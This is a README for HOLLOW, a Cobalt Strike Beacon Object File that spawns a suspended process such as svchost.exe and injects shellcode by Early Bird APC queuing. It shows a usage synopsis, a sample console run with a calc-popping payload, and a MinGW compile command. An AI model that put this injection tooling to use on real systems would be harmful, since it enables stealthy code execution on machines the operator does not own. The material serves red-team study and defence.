Home

Awesome

HOLLOW - Cobalt Strike BOF

Authors:

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode; using the Early Bird injection method taught by @SEKTOR7net in RED TEAM Operator: Malware Development Intermediate.

Run from Cobalt Strike Beacon Console

beacon> help hollow
Synopsis: hollow /path/to/hollow/pe /local/path/to/shellcode.bin
beacon> hollow svchost.exe /Users/bobby.cooke/popCalc.bin
[*] HOLLOW - EarlyBird Remote Process Shellcode Injector (@0xBoku|github.com/boku7) | (@JTHam0|github.com/Rodion0)
[*]             (@n00bRage|github.com/josephkingstone) | (@OakTree__|github.com/git-oaktree)
[*] Reading shellcode from: /Users/bobby.cooke/popCalc.bin
[+] Success - Spawned process for svchost.exe at 5464 (PID)
[+] Success - Allocated RE memory in remote process 5464 (PID) at: 0x000001A83BEC0000
[+] Success - Wrote 280 bytes to memory in remote process 5464 (PID) at 0x000001A83BEC0000
[+] Success - APC queued for main thread of 5464 (PID) to shellcode address 0x000001A83BEC0000
[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!

Compile with x64 MinGW (only tested from macOS):

x86_64-w64-mingw32-gcc -c hollow.x64.c -o hollow.x64.o

To Do List

Credits / References

Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References